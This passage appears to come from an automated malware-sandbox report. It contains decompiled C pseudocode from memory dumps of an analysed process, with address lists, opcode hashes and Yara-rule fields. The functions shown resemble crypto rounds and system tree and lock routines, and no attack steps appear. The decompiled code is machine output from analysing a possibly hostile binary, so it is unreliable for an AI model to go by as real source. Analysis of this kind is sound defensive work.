				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}

0x00402fb0
0x00402fbf
0x00402fc8
0x00402fd6
0x00402fda
0x00402fe3
0x00402ff4
0x00402ff7
0x00402ffc
0x00403005
0x00403013
0x00403018
0x00403021
0x00403031
0x00403051
0x00403054
0x00403066
0x0040306b
0x00403080
0x0040309d
0x004030a0
0x004030b1
0x004030c6
0x004030e6
0x004030e9
0x004030fb
0x00403119
0x00403136
0x00403139
0x0040314b
0x00403160
0x00403166
0x0040316e
0x0040316f
0x00403172
0x00403180
0x00403190
0x004031a2
0x004031b4
0x004031d0
0x004031e3
0x004031f0
0x00403201
0x00403218
0x0040323a
0x0040323d
0x0040324e
0x00403269
0x00403280
0x00403283
0x00403295
0x0040329d
0x004032b2
0x004032cf
0x004032d2
0x004032e3
0x00403307
0x00403317
0x0040331a
0x0040332c
0x00403344
0x00403347
0x0040335a
0x00403367
0x00403379
0x00403391
0x004033b4
0x004033b7
0x004033c9
0x004033de
0x004033e4
0x004033e4
0x004033e7
0x004033e7
0x00403180
0x0040344b
0x00403454
0x00403462
0x004034c0
0x004034c9
0x004034d7
0x00403539
0x00403542
0x0040354f
0x00403552
0x0040359e
0x004035aa
0x004035b3
0x004035c0
0x004035c7

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 030420A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E030420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3108714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03042EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03042EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E030158EC(_t240);
									_t221 =  *0x3105cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3105cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03054A2C(0x3106e40, 0x3054b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03037D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x2ff5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0304F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0304F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03097016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03032400(_t267 + 0x20);
															}
															L03032400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03042397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03032280(_t134, 0x3108608);
									__eflags =  *0x3106e48 - _t253; // 0x142f318
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0302FFB0(_t198, _t241, 0x3108608);
										__eflags = _t253;
										if(_t253 != 0) {
											L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3106e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3108608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03046B90(_t210,  &_v64);
										_t262 =  *0x3108608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0304E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E030597C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0305006A(0x3108608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3108608);
												E0305B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3106904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3106e48; // 0x142f318
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0302FFB0(_t198, _t240, 0x3108608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E030500C2(0x3108608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x030420a0
0x030420a8
0x030420ad
0x030420b3
0x030420b8
0x030420c2
0x030420c7
0x030420cb
0x030420d2
0x03042263
0x03042266
0x03085836
0x03085836
0x00000000
0x0304226c
0x0304226c
0x03042270
0x03042274
0x030420e2
0x030420e2
0x030420e6
0x030420ee
0x030857dc
0x030857de
0x030857ec
0x030857ec
0x030857f1
0x030857f3
0x030857f8
0x00000000
0x030857f8
0x030857e0
0x030857e4
0x030857ea
0x00000000
0x00000000
0x00000000
0x030857ea
0x030420f4
0x030420f4
0x030420f8
0x030420f8
0x030420fc
0x03042100
0x03042106
0x03042201
0x03042206
0x0304220b
0x0304220e
0x030422a9
0x030422ac
0x00000000
0x00000000
0x030422b2
0x030422b5
0x03085801
0x03085806
0x00000000
0x00000000
0x03085810
0x03085815
0x03085818
0x00000000
0x00000000
0x0308581e
0x030422bb
0x030422bb
0x03042218
0x03042218
0x0304221c
0x03042220
0x03042222
0x030422c2
0x030422c4
0x030422dc
0x030422dc
0x030422e1
0x00000000
0x00000000
0x00000000
0x030422e7
0x030422c8
0x030422cd
0x030422d3
0x030422d6
0x03085823
0x03085825
0x03085827
0x00000000
0x00000000
0x0308582d
0x00000000
0x0308582d
0x00000000
0x03042228
0x03042228
0x00000000
0x03042228
0x03042222
0x03042214
0x03042214
0x00000000
0x03042114
0x03042114
0x03042114
0x0304211a
0x0304211c
0x03042348
0x0304234d
0x03085840
0x03085845
0x03085848
0x0308584e
0x0308584e
0x03085848
0x03042353
0x03042355
0x03042388
0x03042388
0x03042368
0x0304236a
0x0304236c
0x0304238f
0x00000000
0x0304236e
0x0304236e
0x0304218e
0x0304218e
0x03042191
0x03042195
0x03085a03
0x03085a06
0x03085a0c
0x03085a0f
0x03085a11
0x03085a13
0x03085a13
0x03085a19
0x03085a1f
0x00000000
0x0304219b
0x0304219b
0x030421a0
0x03042282
0x03042284
0x03042284
0x03042284
0x03042284
0x030421a6
0x030421a9
0x030421ac
0x030421ae
0x030421b3
0x0304228b
0x03042290
0x03042379
0x03042296
0x03042298
0x03042298
0x03042290
0x030421b9
0x030421be
0x030422a2
0x030422a2
0x030421c4
0x030421c8
0x030421cc
0x030421d0
0x030421d4
0x030421de
0x030421e3
0x03085a29
0x03085a2c
0x00000000
0x00000000
0x03085a3b
0x00000000
0x030421e9
0x030421e9
0x030421e9
0x030421ee
0x030421f1
0x03085a45
0x03085a4b
0x03085a52
0x03085a58
0x03085a5d
0x03085a5f
0x03085a71
0x03085a61
0x03085a6a
0x03085a6a
0x03085a76
0x03085a79
0x03085a7f
0x03085a83
0x03085a85
0x03085a87
0x03085a87
0x03085a8c
0x03085a91
0x03085a97
0x03085a9f
0x03085aa0
0x03085aa1
0x03085aa6
0x03085aab
0x03085ab1
0x03085ab3
0x03085ab9
0x03085aca
0x03085ad4
0x03085ad4
0x03085ade
0x03085ade
0x03085aab
0x03085a79
0x03085a52
0x030421f7
0x030421f9
0x030421fe
0x030421fe
0x030421e3
0x03042195
0x0304236c
0x03042122
0x03042122
0x03042124
0x03042231
0x03042236
0x03042236
0x03042238
0x03042238
0x03042240
0x03042242
0x03042244
0x030859fc
0x0304218c
0x0304218c
0x00000000
0x0304218c
0x0304224a
0x0304224f
0x03042256
0x03042304
0x03042309
0x0304230f
0x0304231e
0x0304231e
0x0304231e
0x03042320
0x03042325
0x0304232a
0x0304232c
0x0304233e
0x0304233e
0x00000000
0x0304232c
0x03042311
0x03042317
0x0304231a
0x0304231c
0x03042380
0x03042380
0x03042380
0x03042384
0x00000000
0x00000000
0x03042386
0x00000000
0x0304231c
0x0304225c
0x0304225c
0x00000000
0x0304225c
0x0304212a
0x03042134
0x03042138
0x0304213d
0x03085858
0x03085863
0x03085863
0x03085867
0x0308586a
0x00000000
0x00000000
0x0308586c
0x0308586c
0x03085871
0x03085875
0x03085877
0x03085997
0x0308599c
0x030859a1
0x030859a7
0x030859a7
0x00000000
0x030859a7
0x0308587d
0x00000000
0x0308588b
0x0308588b
0x03085890
0x03085892
0x03085894
0x03085899
0x0308589b
0x030858a0
0x030858a0
0x030858aa
0x030858b2
0x030858b6
0x030858be
0x030858c6
0x030858c9
0x0308590d
0x03085917
0x0308591a
0x0308591c
0x03085920
0x03085928
0x0308592a
0x0308592c
0x0308592e
0x0308592e
0x030858cb
0x030858cd
0x030858d8
0x030858e0
0x030858f4
0x030858fe
0x030858fe
0x0308593a
0x0308593e
0x03085940
0x03085942
0x00000000
0x03085944
0x03085944
0x03085949
0x0308594e
0x0308594e
0x03085953
0x0308595b
0x03085976
0x03085976
0x0308597a
0x0308597f
0x00000000
0x00000000
0x00000000
0x00000000
0x03085981
0x03085981
0x03085981
0x03085983
0x03085988
0x0308598d
0x03085991
0x03085991
0x00000000
0x0308595d
0x0308595d
0x03085963
0x03085965
0x00000000
0x00000000
0x00000000
0x00000000
0x03085967
0x03085967
0x0308596b
0x0308596d
0x00000000
0x00000000
0x0308596f
0x03085971
0x03085971
0x03085974
0x00000000
0x00000000
0x00000000
0x03085974
0x00000000
0x03085967
0x0308595b
0x03085942
0x03085863
0x03042143
0x03042143
0x03042149
0x0304214f
0x030422f1
0x030422f6
0x00000000
0x03042173
0x03042173
0x0304217d
0x03042181
0x03042186
0x030859ae
0x030859b2
0x030859b5
0x030859b7
0x030859ba
0x030859cd
0x030859d1
0x030859d5
0x030859d9
0x030859db
0x00000000
0x00000000
0x030859dd
0x030859dd
0x030859e1
0x030859e4
0x030859e7
0x030859ee
0x030859ee
0x030859f3
0x030859f3
0x00000000
0x03042186
0x0304214f
0x03042106
0x03042266
0x030420d8
0x030420da
0x030420e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2aaadcd03f39681e942de1e0c14cf08cba5de5d07fbdc8d435564e2a6472a16
Instruction ID: 2d1cf592415a179477aeb93f7df8c651c9c079430ef1108af8afc8027138f5a3
Opcode Fuzzy Hash: c2aaadcd03f39681e942de1e0c14cf08cba5de5d07fbdc8d435564e2a6472a16
Instruction Fuzzy Hash: 93F120B070A3019FD765DB28C94076EBBE9AF8A314F088D6DF8959B290D770D941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0302B090, Relevance: .4, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0302B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
